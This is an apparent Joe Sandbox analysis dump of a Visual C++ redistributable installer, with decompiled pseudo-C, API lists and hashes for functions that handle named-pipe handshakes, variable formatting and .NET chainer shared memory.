                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000253a6
                                                                          0x00000000
                                                                          0x0002534e
                                                                          0x000255b3
                                                                          0x000255ba

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00000000,?,0005B4F0,?,00000000,?,0001442A,?,0005B4F0), ref: 00025304
                                                                          • GetCurrentProcessId.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002530F
                                                                          • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0001442A,?,0005B4F0), ref: 00025346
                                                                          • ConnectNamedPipe.KERNEL32(?,00000000,?,0001442A,?,0005B4F0), ref: 0002535B
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 00025365
                                                                          • Sleep.KERNEL32(00000064,?,0001442A,?,0005B4F0), ref: 00025396
                                                                          • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253B9
                                                                          • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253D4
                                                                          • WriteFile.KERNEL32(?,0001442A,0005B4F0,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253EF
                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 0002540A
                                                                          • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 00025425
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002547D
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 000254B1
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 000254E5
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002557B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                          • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                          • API String ID: 2944378912-2047837012
                                                                          • Opcode ID: 89adde74ae7bb587a587c0f5060df5e5ece8d3ffaf5dc8a374ef59b3873daf3f
                                                                          • Instruction ID: b2dc644951057b9440581ce89c90f0e55c30fd7a0a5a3bd140e92c4f4ce4e261
                                                                          • Opcode Fuzzy Hash: 89adde74ae7bb587a587c0f5060df5e5ece8d3ffaf5dc8a374ef59b3873daf3f
                                                                          • Instruction Fuzzy Hash: 8161E872E40735AAF720DAB9DD45BEFB6E9AF04742F114125FE01EB180D7748E4086E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001567D Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 476stringCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E0001567D(struct _CRITICAL_SECTION* _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _t138;
				WCHAR* _t141;
				intOrPtr _t143;
				WCHAR* _t144;
				signed short _t156;
				signed short _t162;
				intOrPtr _t168;
				signed short _t169;
				WCHAR* _t190;
				intOrPtr _t199;
				signed int _t215;
				void* _t216;
				char _t219;
				void* _t221;
				char _t227;
				intOrPtr* _t228;
				signed int _t229;
				intOrPtr* _t237;
				WCHAR* _t238;
				signed int _t239;
				WCHAR* _t240;
				signed int _t241;
				signed int _t242;
				WCHAR* _t243;
				intOrPtr _t244;
				WCHAR* _t248;
				WCHAR* _t249;
				intOrPtr _t250;
				void* _t265;

				_t215 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_v36 = 0;
				_v32 = 0;
				EnterCriticalSection(_a4);
				_t238 = _a8;
				_t248 = E00011EDE( &_v16, lstrlenW(_t238) + 1);
				_a8 = _t248;
				if(_t248 >= 0) {
					while(1) {
						_push(0x5b);
						_t216 = E0003F7CA(_t219);
						_t221 = _t238;
						if(_t216 == 0) {
							break;
						}
						_t12 = _t216 + 2; // 0x2
						_push(0x5d);
						_t138 = E0003F7CA(_t221);
						_v40 = _t138;
						if(_t138 == 0) {
							break;
						}
						_t219 = (_t138 - _t216 >> 1) - 1;
						_v20 = _t219;
						if(_t219 != 0) {
							if(_t216 <= _t238) {
								L12:
								_t26 = _t216 + 2; // 0x2
								_v28 = 0 | _a20 == 0x00000000;
								_t249 = E00018281(_a20 == 0,  &_v12, _t26, _t219);
								_a8 = _t249;
								if(_t249 < 0) {
									_push("Failed to get variable name.");
									L7:
									_push(_t249);
									L8:
									E0005012F();
									L66:
									_t215 = _v8;
									goto L67;
								}
								_t219 = _v24;
								_push(1);
								_push(4 + _v8 * 4);
								if(_t219 == 0) {
									_t244 = E000138D4();
									_v24 = _t244;
									if(_t244 == 0) {
										_t243 = 0x8007000e;
										_t249 = 0x8007000e;
										_a8 = 0x8007000e;
										E000137D3(_t180, "variable.cpp", 0x4b6, 0x8007000e);
										_push("Failed to allocate variable array.");
										L37:
										_push(_t243);
										goto L8;
									}
									L17:
									if(_v20 < 2) {
										L20:
										if(_a20 == 0) {
											L22:
											_t215 = _v8;
											if(_v36 == 0) {
												_t245 = _t244 + _t215 * 4;
												_t249 = E00017203(_t219, _a4, _v12, _t244 + _t215 * 4);
												_a8 = _t249;
												if(_t249 != 0x80070490) {
													L27:
													_t246 = _v28;
													L28:
													if(_t249 < 0) {
														_push("Failed to set variable value.");
														goto L2;
													}
													_t215 = _t215 + 1;
													_v8 = _t215;
													_t249 = E00018260(_t246,  &_v12, L"[%d]", _t215);
													_t265 = _t265 + 0x10;
													_a8 = _t249;
													if(_t249 < 0) {
														_push("Failed to format placeholder string.");
														goto L2;
													}
													_t249 = E0001823E(_t246,  &_v16, _v12, 0);
													_a8 = _t249;
													if(_t249 < 0) {
														_push("Failed to append placeholder.");
														goto L2;
													}
													L31:
													_t238 = _v40 + 2;
													continue;
												}
												_t190 = E000122F9(_t245, 0x5b524, 0);
												L26:
												_t249 = _t190;
												_a8 = _t249;
												goto L27;
											}
											_t190 = E000121A5(_t244 + _t215 * 4, L"*****", 0);
											goto L26;
										}
										_t249 = E00017E13(_t219, _a4, _v12,  &_v36);
										_a8 = _t249;
										if(_t249 < 0) {
											E0005012F(_t249, "Failed to determine variable visibility: \'%ls\'.", _v12);
											goto L66;
										}
										goto L22;
									}
									_t219 = 0x5c;
									if(_t219 !=  *((intOrPtr*)(_t216 + 2))) {
										goto L20;
									}
									_t41 = _t216 + 4; // 0x4
									_t215 = _v8;
									_t246 = _v28;
									_t249 = E00018281(_v28, _t244 + _t215 * 4, _t41, 1);
									_a8 = _t249;
									goto L28;
								}
								_push(_t219);
								_t199 = E00013A72();
								if(_t199 == 0) {
									_t243 = 0x8007000e;
									_t249 = 0x8007000e;
									_a8 = 0x8007000e;
									E000137D3(_t199, "variable.cpp", 0x4b0, 0x8007000e);
									_push("Failed to reallocate variable array.");
									goto L37;
								}
								_t244 = _t199;
								_v24 = _t244;
								goto L17;
							}
							_t249 = E0001823E(0 | _a20 == 0x00000000,  &_v16, _t238, _t216 - _t238 >> 1);
							_a8 = _t249;
							if(_t249 < 0) {
								L6:
								_push("Failed to append string.");
								goto L7;
							} else {
								_t219 = _v20;
								goto L12;
							}
						}
						_t249 = E0001823E(0 | _a20 == 0x00000000,  &_v16, _t238, (_t138 - _t238 >> 1) + 1);
						_a8 = _t249;
						if(_t249 >= 0) {
							goto L31;
						}
						goto L6;
					}
					_t218 = 0 | _a20 == 0x00000000;
					_t141 = E0001823E(_a20 == 0,  &_v16, _t238, 0);
					_t249 = _t141;
					_a8 = _t249;
					if(_t249 < 0) {
						goto L6;
					}
					_push(_v8);
					L0004F3D0();
					_t240 = _t141;
					_v32 = _t240;
					if(_t240 != 0) {
						_push(_v16);
						_push(0);
						_push(_t240);
						L0004F3E0();
						if(0 == 0) {
							_t227 = 0;
							_t241 = 0;
							if(_v8 <= 0) {
								L53:
								_t242 = _v32;
								_t156 =  &_v20;
								_push(_t156);
								_push(0x5b524);
								_push(_t242);
								_push(_t227);
								_v20 = _t227;
								L0004F3F0();
								if(_t156 == 0xea || _t156 == 0) {
									if(_a12 == 0) {
										L64:
										_t228 = _a16;
										if(_t228 != 0) {
											 *_t228 = _v20;
										}
										goto L66;
									}
									_v20 = _v20 + 1;
									_t249 = E0001821F(_t218,  &_v12, _v20 + 1);
									_a8 = _t249;
									if(_t249 >= 0) {
										_t162 =  &_v20;
										_push(_t162);
										_push(_v12);
										_push(_t242);
										_push(0);
										L0004F3F0();
										if(_t162 == 0) {
											_t249 = E00018281(_t218, _a12, _v12, 0);
											_a8 = _t249;
											if(_t249 >= 0) {
												goto L64;
											}
											_push("Failed to copy string.");
											goto L7;
										}
										_t254 =  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
										_t249 =  >=  ? 0x80004005 :  <=  ? _t162 : _t162 & 0x0000ffff | 0x80070000;
										_a8 = _t249;
										E000137D3(0x80004005, "variable.cpp", 0x508, _t249);
										_push("Failed to format record.");
										goto L7;
									}
									_push("Failed to allocate string.");
								} else {
									_t257 =  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
									_t249 =  >=  ? 0x80004005 :  <=  ? _t156 : _t156 & 0x0000ffff | 0x80070000;
									_a8 = _t249;
									E000137D3(0x80004005, "variable.cpp", 0x4fe, _t249);
									_push("Failed to get formatted length.");
								}
								goto L7;
							}
							_t168 = _v24;
							_t229 = _v8;
							do {
								_t237 =  *((intOrPtr*)(_t168 + _t241 * 4));
								_t249 = _a8;
								if( *_t237 == 0) {
									goto L51;
								}
								_push(_t237);
								_t89 = _t241 + 1; // 0x1
								_t169 = _t89;
								_push(_t169);
								_push(_v32);
								L0004F3E0();
								if(_t169 != 0) {
									_t261 =  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
									_t249 =  >=  ? 0x80004005 :  <=  ? _t169 : _t169 & 0x0000ffff | 0x80070000;
									_a8 = _t249;
									E000137D3(0x80004005, "variable.cpp", 0x4f2, _t249);
									_push("Failed to set record string.");
									goto L7;
								}
								_t168 = _v24;
								_t229 = _v8;
								L51:
								_t241 = _t241 + 1;
							} while (_t241 < _t229);
							_t227 = 0;
							goto L53;
						}
						_t264 =  <=  ? 0 : 0xffffffff80070000;
						_t249 =  >=  ? 0x80004005 :  <=  ? 0 : 0xffffffff80070000;
						_a8 = _t249;
						E000137D3(0x80004005, "variable.cpp", 0x4ea, _t249);
						_push("Failed to set record format string.");
						goto L7;
					}
					_t243 = 0x8007000e;
					_t249 = 0x8007000e;
					_a8 = 0x8007000e;
					E000137D3(_t141, "variable.cpp", 0x4e6, 0x8007000e);
					_push("Failed to allocate record.");
					goto L37;
				} else {
					_push("Failed to allocate buffer for format string.");
					L2:
					_push(_t249);
					E0005012F();
					L67:
					LeaveCriticalSection(_a4);
					_t143 = _v24;
					if(_t143 == 0) {
						L77:
						_t144 = _v32;
						if(_t144 != 0) {
							_push(_t144);
							L0004F3C0();
						}
						if(_a20 == 0) {
							E00012793(0);
							E00012793(_v16);
							E00012793(_v12);
						} else {
							if(_v16 != 0) {
								E000554EF(_v16);
							}
							if(_v12 != 0) {
								E000554EF(_v12);
							}
						}
						return _t249;
					}
					_t239 = 0;
					if(_t215 == 0) {
						L76:
						E00013999(_t143);
						goto L77;
					}
					_t250 = _t143;
					do {
						if(_a20 == 0) {
							E00012793( *((intOrPtr*)(_t250 + _t239 * 4)));
						} else {
							if( *((intOrPtr*)(_t250 + _t239 * 4)) != 0) {
								E000554EF( *((intOrPtr*)(_t250 + _t239 * 4)));
							}
						}
						_t239 = _t239 + 1;
					} while (_t239 < _t215);
					_t249 = _a8;
					_t143 = _v24;
					goto L76;
				}
			}









































                                                                          0x0001568b
                                                                          0x0001568d
                                                                          0x00015690
                                                                          0x00015693
                                                                          0x00015696
                                                                          0x00015699
                                                                          0x0001569c
                                                                          0x0001569f
                                                                          0x000156a2
                                                                          0x000156a8
                                                                          0x000156bd
                                                                          0x000156bf
                                                                          0x000156c4
                                                                          0x000158b1
                                                                          0x000158b1
                                                                          0x000158b9
                                                                          0x000158bc
                                                                          0x000158bf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000156dc
                                                                          0x000156df
                                                                          0x000156e2
                                                                          0x000156e7
                                                                          0x000156ee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000156fa
                                                                          0x000156fd
                                                                          0x00015700
                                                                          0x0001573c
                                                                          0x00015764
                                                                          0x00015767
                                                                          0x00015776
                                                                          0x0001577e
                                                                          0x00015780
                                                                          0x00015785
                                                                          0x00015998
                                                                          0x0001572d
                                                                          0x0001572d
                                                                          0x0001572e
                                                                          0x0001572e
                                                                          0x00015b50
                                                                          0x00015b50
                                                                          0x00000000
                                                                          0x00015b50
                                                                          0x0001578e
                                                                          0x00015791
                                                                          0x0001579a
                                                                          0x0001579d
                                                                          0x000157b9
                                                                          0x000157bb
                                                                          0x000157c0
                                                                          0x00015977
                                                                          0x00015982
                                                                          0x00015989
                                                                          0x0001598c
                                                                          0x00015991
                                                                          0x0001593d
                                                                          0x0001593d
                                                                          0x00000000
                                                                          0x0001593d
                                                                          0x000157c6
                                                                          0x000157ca
                                                                          0x000157f2
                                                                          0x000157f6
                                                                          0x00015814
                                                                          0x00015818
                                                                          0x0001581b
                                                                          0x00015830
                                                                          0x0001583f
                                                                          0x00015841
                                                                          0x0001584a
                                                                          0x0001585f
                                                                          0x0001585f
                                                                          0x00015862
                                                                          0x00015864
                                                                          0x0001596d
                                                                          0x00000000
                                                                          0x0001596d
                                                                          0x0001586a
                                                                          0x00015876
                                                                          0x0001587e
                                                                          0x00015880
                                                                          0x00015883
                                                                          0x00015888
                                                                          0x00015963
                                                                          0x00000000
                                                                          0x00015963
                                                                          0x0001589e
                                                                          0x000158a0
                                                                          0x000158a5
                                                                          0x00015959
                                                                          0x00000000
                                                                          0x00015959
                                                                          0x000158ab
                                                                          0x000158ae
                                                                          0x00000000
                                                                          0x000158ae
                                                                          0x00015855
                                                                          0x0001585a
                                                                          0x0001585a
                                                                          0x0001585c
                                                                          0x00000000
                                                                          0x0001585c
                                                                          0x00015829
                                                                          0x00000000
                                                                          0x00015829
                                                                          0x00015807
                                                                          0x00015809
                                                                          0x0001580e
                                                                          0x0001594c
                                                                          0x00000000
                                                                          0x00015951
                                                                          0x00000000
                                                                          0x0001580e
                                                                          0x000157ce
                                                                          0x000157d3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000157d5
                                                                          0x000157d8
                                                                          0x000157e1
                                                                          0x000157eb
                                                                          0x000157ed
                                                                          0x00000000
                                                                          0x000157ed
                                                                          0x0001579f
                                                                          0x000157a0
                                                                          0x000157a7
                                                                          0x0001591e
                                                                          0x00015929
                                                                          0x00015930
                                                                          0x00015933
                                                                          0x00015938
                                                                          0x00000000
                                                                          0x00015938
                                                                          0x000157ad
                                                                          0x000157af
                                                                          0x00000000
                                                                          0x000157af
                                                                          0x00015758
                                                                          0x0001575a
                                                                          0x0001575f
                                                                          0x00015728
                                                                          0x00015728
                                                                          0x00000000
                                                                          0x00015761
                                                                          0x00015761
                                                                          0x00000000
                                                                          0x00015761
                                                                          0x0001575f
                                                                          0x0001571b
                                                                          0x0001571d
                                                                          0x00015722
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015722
                                                                          0x000158ca
                                                                          0x000158d6
                                                                          0x000158db
                                                                          0x000158dd
                                                                          0x000158e2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000158e8
                                                                          0x000158eb
                                                                          0x000158f0
                                                                          0x000158f2
                                                                          0x000158f7
                                                                          0x000159a2
                                                                          0x000159a7
                                                                          0x000159a8
                                                                          0x000159a9
                                                                          0x000159b0
                                                                          0x000159e7
                                                                          0x000159e9
                                                                          0x000159ee
                                                                          0x00015a21
                                                                          0x00015a21
                                                                          0x00015a24
                                                                          0x00015a27
                                                                          0x00015a28
                                                                          0x00015a2d
                                                                          0x00015a2e
                                                                          0x00015a2f
                                                                          0x00015a32
                                                                          0x00015a3c
                                                                          0x00015ab0
                                                                          0x00015b44
                                                                          0x00015b44
                                                                          0x00015b49
                                                                          0x00015b4e
                                                                          0x00015b4e
                                                                          0x00000000
                                                                          0x00015b49
                                                                          0x00015abb
                                                                          0x00015ac8
                                                                          0x00015aca
                                                                          0x00015acf
                                                                          0x00015adb
                                                                          0x00015ae0
                                                                          0x00015ae1
                                                                          0x00015ae4
                                                                          0x00015ae5
                                                                          0x00015ae6
                                                                          0x00015aed
                                                                          0x00015b31
                                                                          0x00015b33
                                                                          0x00015b38
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015b3a
                                                                          0x00000000
                                                                          0x00015b3a
                                                                          0x00015afa
                                                                          0x00015b04
                                                                          0x00015b12
                                                                          0x00015b15
                                                                          0x00015b1a
                                                                          0x00000000
                                                                          0x00015b1a
                                                                          0x00015ad1
                                                                          0x00015a42
                                                                          0x00015a4d
                                                                          0x00015a57
                                                                          0x00015a65
                                                                          0x00015a68
                                                                          0x00015a6d
                                                                          0x00015a6d
                                                                          0x00000000
                                                                          0x00015a3c
                                                                          0x000159f0
                                                                          0x000159f3
                                                                          0x000159f6
                                                                          0x000159f6
                                                                          0x000159fe
                                                                          0x00015a01
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00015a03
                                                                          0x00015a04
                                                                          0x00015a04
                                                                          0x00015a07
                                                                          0x00015a08
                                                                          0x00015a0b
                                                                          0x00015a12
                                                                          0x00015a82
                                                                          0x00015a8c
                                                                          0x00015a9a
                                                                          0x00015a9d
                                                                          0x00015aa2
                                                                          0x00000000
                                                                          0x00015aa2
                                                                          0x00015a14
                                                                          0x00015a17
                                                                          0x00015a1a
                                                                          0x00015a1a
                                                                          0x00015a1b
                                                                          0x00015a1f
                                                                          0x00000000
                                                                          0x00015a1f
                                                                          0x000159bd
                                                                          0x000159c7
                                                                          0x000159d5
                                                                          0x000159d8
                                                                          0x000159dd
                                                                          0x00000000
                                                                          0x000159dd
                                                                          0x000158fd
                                                                          0x00015908
                                                                          0x0001590f
                                                                          0x00015912
                                                                          0x00015917
                                                                          0x00000000
                                                                          0x000156ca
                                                                          0x000156ca
                                                                          0x000156cf
                                                                          0x000156cf
                                                                          0x000156d0
                                                                          0x00015b53
                                                                          0x00015b56
                                                                          0x00015b5c
                                                                          0x00015b61
                                                                          0x00015b9c
                                                                          0x00015b9c
                                                                          0x00015ba1
                                                                          0x00015ba3
                                                                          0x00015ba4
                                                                          0x00015ba4
                                                                          0x00015bad
                                                                          0x00015bd0
                                                                          0x00015bd8
                                                                          0x00015be0
                                                                          0x00015baf
                                                                          0x00015bb3
                                                                          0x00015bb8
                                                                          0x00015bb8
                                                                          0x00015bc1
                                                                          0x00015bc6
                                                                          0x00015bc6
                                                                          0x00015bc1
                                                                          0x00015bed
                                                                          0x00015bed
                                                                          0x00015b65
                                                                          0x00015b69
                                                                          0x00015b96
                                                                          0x00015b97
                                                                          0x00000000
                                                                          0x00015b97
                                                                          0x00015b6b
                                                                          0x00015b6d
                                                                          0x00015b71
                                                                          0x00015b86
                                                                          0x00015b73
                                                                          0x00015b77
                                                                          0x00015b7c
                                                                          0x00015b7c
                                                                          0x00015b77
                                                                          0x00015b8b
                                                                          0x00015b8c
                                                                          0x00015b90
                                                                          0x00015b93
                                                                          0x00000000
                                                                          0x00015b93

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,000199BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000156A2
                                                                          • lstrlenW.KERNEL32(00000000,?,000199BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000156AC
                                                                          • _wcschr.LIBVCRUNTIME ref: 000158B4
                                                                          • LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,000199BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 00015B56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                          • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                          • API String ID: 1026845265-2050445661
                                                                          • Opcode ID: 026c7dc206d3fc087c1e7f17c130145d40f6981f904588b0ad4567a0764299d9
                                                                          • Instruction ID: 93398035f393ade6b86ff9e1a96e79658038a7acf60ebc148dbe1ee2c6eb4463
                                                                          • Opcode Fuzzy Hash: 026c7dc206d3fc087c1e7f17c130145d40f6981f904588b0ad4567a0764299d9
                                                                          • Instruction Fuzzy Hash: F0F19371D04B15EADB219FA48C41AEF7BE8EF84752F11412AFD05AF281D7349E818BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003CC24 Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 235synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 57%
                                                                          			E0003CC24(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void*** _a12) {
				long _v8;
				void* __edi;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t56;
				void* _t57;
				signed short _t80;
				signed short _t84;
				signed short _t87;
				signed short _t90;
				signed short _t93;
				WCHAR* _t99;
				void** _t108;
				void* _t113;
				void* _t131;
				void* _t132;

				_t98 = __ebx;
				_v8 = 0;
				_t108 = E000138D4(0x18, 1);
				if(_t108 != 0) {
					_push(__ebx);
					_t99 = _a8;
					_t48 = CreateEventW(0, 0, 0, _t99);
					_t108[1] = _t48;
					if(_t48 != 0) {
						_t50 = E00011F20( &_v8, L"%ls_send", _t99);
						_t132 = _t131 + 0xc;
						if(_t50 >= 0) {
							_t52 = CreateEventW(0, 0, 0, _v8);
							_t108[2] = _t52;
							if(_t52 != 0) {
								_t113 = E00011F20( &_v8, L"%ls_mutex", _t99);
								_t132 = _t132 + 0xc;
								if(_t113 >= 0) {
									_t55 = CreateMutexW(0, 1, _v8);
									_t108[3] = _t55;
									if(_t55 != 0) {
										_t56 = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10000, _a4);
										 *_t108 = _t56;
										if(_t56 != 0) {
											_t57 = MapViewOfFile(_t56, 2, 0, 0, 0);
											_t108[4] = _t57;
											if(_t57 != 0) {
												_t113 = E00011BEA(_t57 + 0x21a, 0x104, _t99);
												if(_t113 >= 0) {
													 *(_t108[4]) = 0;
													 *((char*)(_t108[4] + 0x218)) = 0;
													 *((intOrPtr*)(_t108[4] + 4)) = 0x8000000a;
													 *((char*)(_t108[4] + 2)) = 0;
													 *((char*)(_t108[4] + 1)) = 0;
													 *((char*)(_t108[4] + 0x219)) = 0;
													 *((intOrPtr*)(_t108[4] + 8)) = 0x8000000a;
													 *((char*)(_t108[4] + 3)) = 0;
													 *((intOrPtr*)(_t108[4] + 0xc)) = 0;
													 *((char*)(_t108[4] + 0x422)) = 1;
													 *((intOrPtr*)(_t108[4] + 0x424)) = 0;
													 *((intOrPtr*)(_t108[4] + 0x428)) = 0;
													 *((intOrPtr*)(_t108[4] + 0x42c)) = 0;
													ReleaseMutex(_t108[3]);
													 *_a12 = _t108;
													_t108 = 0;
												} else {
													_push("failed to copy event name to shared memory structure.");
													goto L20;
												}
											} else {
												_t80 = GetLastError();
												_t118 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
												_t113 =  >=  ? 0x80004005 :  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
												E000137D3(0x80004005, "NetFxChainer.cpp", 0x43, _t113);
												_push(_a4);
												_push("Failed to MapViewOfFile for %ls.");
												goto L17;
											}
										} else {
											_t84 = GetLastError();
											_t121 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
											_t113 =  >=  ? 0x80004005 :  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "NetFxChainer.cpp", 0x3c, _t113);
											_push(_a4);
											_push("Failed to memory map cabinet file: %ls");
											goto L17;
										}
									} else {
										_t87 = GetLastError();
										_t124 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
										_t113 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "NetFxChainer.cpp", 0x34, _t113);
										_push(_v8);
										_push("Failed to create mutex: %ls");
										goto L17;
									}
								} else {
									_push("failed to allocate memory for mutex name");
									goto L20;
								}
							} else {
								_t90 = GetLastError();
								_t127 =  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
								_t113 =  >=  ? 0x80004005 :  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "NetFxChainer.cpp", 0x2d, _t113);
								_push(_v8);
								goto L8;
							}
						} else {
							_push("failed to allocate memory for event name");
							L20:
							_push(_t113);
							E0005012F();
						}
					} else {
						_t93 = GetLastError();
						_t130 =  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
						_t113 =  >=  ? 0x80004005 :  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "NetFxChainer.cpp", 0x27, _t113);
						_push(_t99);
						L8:
						_push("Failed to create event: %ls");
						L17:
						_push(_t113);
						E0005012F();
					}
					_pop(_t98);
				} else {
					_t113 = 0x8007000e;
					E000137D3(_t47, "NetFxChainer.cpp", 0x24, 0x8007000e);
					_push("Failed to allocate memory for NetFxChainer struct.");
					_push(0x8007000e);
					E0005012F();
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				if(_t108 != 0) {
					if(_t108[3] != 0) {
						ReleaseMutex(_t108[3]);
					}
					E0003CEF5(_t98, _t108, _t108);
				}
				return _t113;
			}





















                                                                          0x0003cc24
                                                                          0x0003cc30
                                                                          0x0003cc38
                                                                          0x0003cc3c
                                                                          0x0003cc62
                                                                          0x0003cc63
                                                                          0x0003cc6a
                                                                          0x0003cc70
                                                                          0x0003cc75
                                                                          0x0003ccaf
                                                                          0x0003ccb6
                                                                          0x0003ccbb
                                                                          0x0003cccf
                                                                          0x0003ccd5
                                                                          0x0003ccda
                                                                          0x0003cd23
                                                                          0x0003cd25
                                                                          0x0003cd2a
                                                                          0x0003cd3e
                                                                          0x0003cd44
                                                                          0x0003cd49
                                                                          0x0003cd91
                                                                          0x0003cd97
                                                                          0x0003cd9b
                                                                          0x0003cdd8
                                                                          0x0003cdde
                                                                          0x0003cde3
                                                                          0x0003ce37
                                                                          0x0003ce3b
                                                                          0x0003ce56
                                                                          0x0003ce5b
                                                                          0x0003ce64
                                                                          0x0003ce6a
                                                                          0x0003ce70
                                                                          0x0003ce76
                                                                          0x0003ce7f
                                                                          0x0003ce85
                                                                          0x0003ce8b
                                                                          0x0003ce91
                                                                          0x0003ce9b
                                                                          0x0003cea4
                                                                          0x0003cead
                                                                          0x0003ceb6
                                                                          0x0003cebf
                                                                          0x0003cec1
                                                                          0x0003ce3d
                                                                          0x0003ce3d
                                                                          0x00000000
                                                                          0x0003ce3d
                                                                          0x0003cde5
                                                                          0x0003cde5
                                                                          0x0003cdf6
                                                                          0x0003ce00
                                                                          0x0003ce0b
                                                                          0x0003ce10
                                                                          0x0003ce13
                                                                          0x00000000
                                                                          0x0003ce13
                                                                          0x0003cd9d
                                                                          0x0003cd9d
                                                                          0x0003cdae
                                                                          0x0003cdb8
                                                                          0x0003cdc3
                                                                          0x0003cdc8
                                                                          0x0003cdcb
                                                                          0x00000000
                                                                          0x0003cdcb
                                                                          0x0003cd4b
                                                                          0x0003cd4b
